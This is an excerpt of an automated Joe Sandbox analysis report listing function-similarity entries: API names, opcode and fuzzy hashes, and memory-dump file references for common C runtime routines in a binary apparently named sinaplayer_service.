                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DecodePointerfree
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 2443025543-1018135373
                                                                                                                                                                                                    • Opcode ID: 6443338cf6f9e33e09cf072bf3cda93aa743f7e0a58832f4ce77f4899ccab69e
                                                                                                                                                                                                    • Instruction ID: f80e7b22107179441d90cebde83b0afaf2467e4a0f14efe2f4326d0d89b34fa9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6443338cf6f9e33e09cf072bf3cda93aa743f7e0a58832f4ce77f4899ccab69e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF04F345083039BEB344E28D48472AF7F5AF18211B658A1EE4A68A691CB72E885C780
                                                                                                                                                                                                    Function 6D09E050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: B
                                                                                                                                                                                                    • API String ID: 2959964966-1255198513
                                                                                                                                                                                                    • Opcode ID: 325f79127ad4fc52a8cc1f41517fe48395ca9ba3899d45f22d069bfb9b173150
                                                                                                                                                                                                    • Instruction ID: a4a692b76271f840c97d49a0d1e3684351ab67aa642ba3fb1df4c2a3ce475a39
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 325f79127ad4fc52a8cc1f41517fe48395ca9ba3899d45f22d069bfb9b173150
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDF06274D0420E9FDF048F64CC006EEBBB4FB48324F508226E92466291D73545119FA5
                                                                                                                                                                                                    Function 6D0B03E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::Name::operator+
                                                                                                                                                                                                    • String ID: unsigned
                                                                                                                                                                                                    • API String ID: 2649573449-4012841044
                                                                                                                                                                                                    • Opcode ID: 51baeed83f0bfe0c10941093268ae46759d72c4d7feadb6e12fc1511d4fc7850
                                                                                                                                                                                                    • Instruction ID: af90349e458d464ba1ee361d1ee0c37a8257ff3a37e460929a854a25d7b3fc5a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51baeed83f0bfe0c10941093268ae46759d72c4d7feadb6e12fc1511d4fc7850
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6E030B6E0C10B6AEB44CEFECB456FEBBB86E09204740452A9510E3555E7318601CB20